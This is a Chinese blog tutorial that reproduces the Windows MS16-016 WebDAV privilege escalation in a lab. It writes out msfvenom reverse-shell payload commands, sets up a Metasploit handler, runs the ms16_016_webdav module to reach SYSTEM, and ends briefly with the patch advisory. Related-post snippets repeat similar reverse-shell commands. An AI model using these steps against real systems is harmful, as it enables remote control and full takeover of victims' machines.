MS16_016 漏洞利用与安全加固

已于 2024-03-21 10:46:14 修改
阅读量847 收藏 22
点赞数 14
文章标签: 安全 网络安全 系统安全 web安全 安全架构 网络攻击模型 可信计算技术
于 2024-03-18 22:11:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/theravensea/article/details/136817483
版权

文章目录

环境说明

  • 渗透机操作系统:kali-linux-2024.1-installer-amd64
  • 漏洞复现操作系:cn_windows_7_professional_with_sp1_x64_dvd_u_677031

1 MS16_016 简介

MS16_016 漏洞产生的原因是由于 Windows 中的 WebDAV(分布式创作和版本管理)未正确处理客户端发送的信息,攻击者可以运行经过特殊设计的应用程序,从而提升权限。

2 MS16_016 复现过程

在开始之前请关闭靶机的防火墙, 关于渗透机和靶机环境的搭建可自行Bing

靶机需 32位 Windows系统,一定是32位的操作系统,要不然不能成功实现,有知道原因的可以留言

步骤01、

打开网络拓补,单机 “启动”按钮,启动实现虚拟机,如图所示。
在这里插入图片描述

步骤02、

使用 ifconfig ipconfig命令分别获取渗透机和靶机的IP的地址,使用ping 命令进行网络 连通性测试,确保网络可达。

渗透机的IP 地址为 192.168.254.134,如图所示。

渗透机的IP地址

在这里插入图片描述

靶机的IP地址为 192.168.254.131,如图所示。

靶机的IP地址

在这里插入图片描述

步骤03、

在 Kali 终端下 使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=渗透机IP LPORT=木马通信端口 -f 输出格式 > 文件名 命令 生成木马文件,如图所示。

-p 指定需要使用的 载荷(Payload)

在这里插入图片描述

命令执行结束,在 /home/kali 目录下创建文件 theRavensea.exe ,如图所示。

文件生成在我们当前终端所在的目录下

在这里插入图片描述

步骤04、

使用 msfconsole 命令启动Metasploit 渗透测试平台,如图所示。

启动 Metasploit

在这里插入图片描述

步骤05、

使用 use /exploit/multi/handler 命令调用监听模块,同时使用 set payload windows/meterpreter/reverse_tcp 命令,设置本地监听的地址 192.168.254.134,设置监听端口 8888,最后使用 show options 命令查看最终的配置,如图所示。

查看配置参数 (端口号要与生成木马的端口号一致)

在这里插入图片描述

使用 run 或者 exploit 开启监听模式

运行溢出模块

在这里插入图片描述

步骤06、

将步骤3 中创建的木马文件复制到靶机中。复制过程中如果木马文件被安全软件删除,恢复即可。再运行木马,运行结束后,渗透机将会获得一个 meterpreter 会话,如图所示。

在靶机中打开 木马程序运行

在这里插入图片描述

获得 session 会话

在这里插入图片描述

步骤07、

使用 shell 命令启动 Meterpreter 下 cmd 的 Shell 终端,如图所示。

获取操作系统的 Shell

在这里插入图片描述

使用 whoami 命令查看当前的系统权限,如图所示。

查看用户权限

在这里插入图片描述

步骤08、

使用 background 命令将会话置于后台,会话编号为 1,如图所示。

exit 退出 Shell 终端

在这里插入图片描述

步骤09、

使用 use exploit/windows/local/ms16_016_webdav 命令调用漏洞利用模块,同时使用 set SESSION 命令设置刚才获得权限的会话,使用 set LPORT 命令设置载荷模块的监听的本地端口,然后使用 run 或者 exploit 命令运行该模块,如图所示。

使用 ms16_016_webdav 模块,将会话进入高权限进程

在这里插入图片描述

使用 ms16_016_webdav 模块,将会话注入高权限进程,执行结果可知会话被成功注入 “1628” 进程,如图所示。

获取注入的进程号

在这里插入图片描述

步骤10、

使用 set sessions 重新进入会话,如图所示。

进入注入进程,进程号为2720

在这里插入图片描述

步骤11、

使用 shell 命令启动 Meterpreter 下 cmd 的 Shell 终端,查看获取的会话权限,如图所示

会话的权限为 “system” , 即为系统权限,提升权限成功

在这里插入图片描述

3 MS16_016 安全加固

步骤12、

此安全更新可解决 Microsoft Windows 中的漏洞。 如果攻击者使用 Microsoft Web 分布式创作和版本控制(WebDAV)客户端将专门制作的输入发送到服务器,则漏洞可能会允许提升特权。

对于 Windows Vista、Windows Server 2008、Windows 7 和 Windows Server 2008 R2,以及 Windows 8.1、Windows Server 2012、Windows Server 2012 R2、Windows RT 8.1 和 Windows 10,此安全更新的评分为重要。 有关详细信息,请参阅 “受影响的软件 ”部分。

安全更新通过更正 WebDAV 验证内存的方式来解决漏洞。 有关漏洞的详细信息,请参阅 “漏洞信息 ”部分。

官方安全公告

在这里插入图片描述

theRavensea
关注
  • 14
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS16-016漏洞复现
qq_45440239的博客
06-01 1783
复现MS16-016漏洞
ms16-032本地溢出漏洞
06-27
【标题】:“ms16-032本地溢出漏洞”是微软在2016年发布的一个重要的安全更新,该漏洞主要影响Windows操作系统。这个漏洞的命名方式遵循了微软的传统,即“ms”代表微软,“16”代表2016年,而“032”则可能是该年中...
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8641
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
ms16-016提权
qq_54713392的博客
05-08 1197
ms16-016提权 简介:靶机需32位windows系统 攻击机:kali IP地址为:192.168.32.132 目标机:windows32 IP地址:192.168.32.135 先ping两台主机看是否通 步骤: 1)生成木马,设置本地ip地址192.168.32.132和端口号4444 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe 2)
生成木马反弹和简单的Windows提权
BRMTSW的博客
03-01 651
生成木马反弹和简单的Windows提权
Meterpreter 提权
eli的博客
05-20 2201
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
M_D77MS16 FB库
11-23
然而,考虑到标签中的"M_D77MS16 FB库"通常与西门子相关,这里可能是命名上的一个小混淆。实际上,"M_D77MS16 FB.gxw"可能是一个误标,或者表明这个FB库是为兼容三菱系统的应用而设计的,或者至少部分功能可以跨平台...
QD77MS16 范例程序
03-17
通过这个"TEST.gxw"文件,开发者可以学习如何编写针对QD77MS16的控制程序,了解如何利用其强大的功能来实现精确的步进电机控制。实际操作时,需要配合硬件设备,将程序下载到QD77MS16中,然后观察电机的实际运行效果...
kali linux基础配置文档
02-25
### Kali Linux基础配置知识点详解 #### 美化篇:Kali Linux的主题...以上知识点涵盖了 Kali Linux 的基础配置,包括美化、软件安装以及系统优化等方面,旨在帮助用户更好地利用 Kali Linux 进行日常工作或安全测试。
三菱PLC QD77MS QD77MS16定位模块视频 编程讲解教程+使用手册+程序样例.zip
06-15
第4集 QD77ms视频教程 MS2 ms4 MS16的JOG及原点程序讲解 第5集 定位控制的几种方式 第6集 让马达按规定速度一直转动 一直正转或者反转 第7集 中途走了一节 停止了 如何重新启动 第8集 当前定位数据监控 和如何将当前...
MS08067,MS10061漏洞靶机环境搭建.docx
07-07
MS08067,MS10061漏洞靶机环境搭建过程,演示靶机的搭建过程,用于攻防演练,渗透小白可以看一下
Web漏洞分析-文件解析及上传(中)
qq_61861243的博客
12-13 92
当php遇到文件路径“/aaa.xxx/bbb.yyy/ccc.zzz”时,若“/aaa.xxxbbb.yyy/ccc.zzz”不存在,则会去掉最后的“/ccc.zzz”,然后判断“aaa.xxx/bbb.yyy”是否存在,若存在,则把“/aaa.xxx/bbb.yyy”当做文件“/aaa.xxx/bbb.yyy/ccc.zzz”,若“/aaa.xxx/bbb.yyy”仍不存在,则继续去掉“/bbb.yyy”,以此类推。①、将php.ini文件中的cgi.fix_pathinfo的值设为0。
MS16_016 漏洞利用安全加固_exploit windows local ms16_016_webdav
2301_78398209的博客
04-11 836
MS16_016 漏洞产生的原因是由于 Windows 中的 WebDAV(分布式创作和版本管理)未正确处理客户端发送的信息,攻击者可以运行经过特殊设计的应用程序,从而提升权限。
Windows提权,网络安全编程基础
m0_60607895的博客
04-08 927
msset payload windows/meterpreter/reverse_tcp # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;set lhost 192.168.x.x # 我们的kali本机ipset lport 6666 # 我们的kali本机端口exploit使用msfvenom模块生成反弹木马:伪装成cmd.exemsfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;
使用msfveonm后门生成模块和msfconsole获取主机权限(windows)
最新发布
X1DD1Asad343的博客
06-05 303
运行(为了保证设置的参数的正确性,在运行前可以使用show options 命令检查对应参数是否设置正确)监听需要使用到msfconsole(MSF)中的exploit/multi/handler监听模块。配置相应参数(可以使用show options 命令查看参数情况)设置监听端口(在不设置监听端口的情况下,默认监听端口为4444)后门在目标设备上运行后,监听设备即可看到目标设备上线。获取shell,同时查看当前用户权限信息。设置监听主机(一般就是kali的IP)接下来可以尝试输入一些命令。
msf内网提权
dreamthe的博客
11-22 2343
目录 1.利用木马文件拿到shell 2.利用ms_2018_8120提权 3.提高程序运行级别。 4.基于ms16_016提权 5.基于ms14_058提权 ​6.基于ms13_053提权 7.uac绕过 8.基于ms16_032提权 1.利用木马文件拿到shell 这里呢我们就不多说了,在上一篇文章里面我进行详细说明和演示。如果有不懂的朋友可以看上一篇的文章,上一篇文章:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的...
Windows内核漏洞利用提权教程
systemino的博客
04-19 1472
PS. 本文仅限于技术讨论,严禁用于其他用途。 继上一篇“使用自动化脚本进行Windows提权”,本文将介绍有关Windows内核漏洞提权的方法。我将使用内置的Metasploit模块作为演示。通过本文的学习,你将了解系统的哪些部分可被利用,并匹配最佳可利用模块进一步的提升权限。 Windows-Exploit-suggester Metasploit内置模块提供了各种可用于提权的local...
【小迪实地】Webdav安全配置相关与漏洞利用
玫瑰安全
05-17 8980
0x00 简介 WebDAV是一种基于 HTTP 1.1协议的通信协议.它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法。 使应用程序可直接对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。 IIS实现Webdav是采用的其两种接口CGI、ISAPI的ISAPI
WebDAV安全测试分析
na_tion的专栏
11-03 5672
本文描述IIS 6.0中WebDAV安全测试过程及注意事项,环境如下: IIS:win7 VM安装的win server 2003的IIS 6.0 使用工具:burp suit 一、判断是否开启WebDAV 1.1 IIS 6.0 中WebDAV的关闭与开启位置 1.2 WebDAV禁止与允许时,burp suit测试效果 -- PS:请求中,OPTI
提权实战:MS16-075漏洞利用与Meterpreter反弹
本次实战笔记记录了一次关于利用MS16-075漏洞进行提权的过程,该漏洞是Windows SMB服务器的特权提升漏洞,其CVE编号为CVE-2016-3225。攻击者通过转发其他服务的身份验证请求,能够在SMB服务中触发漏洞,进而实现权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值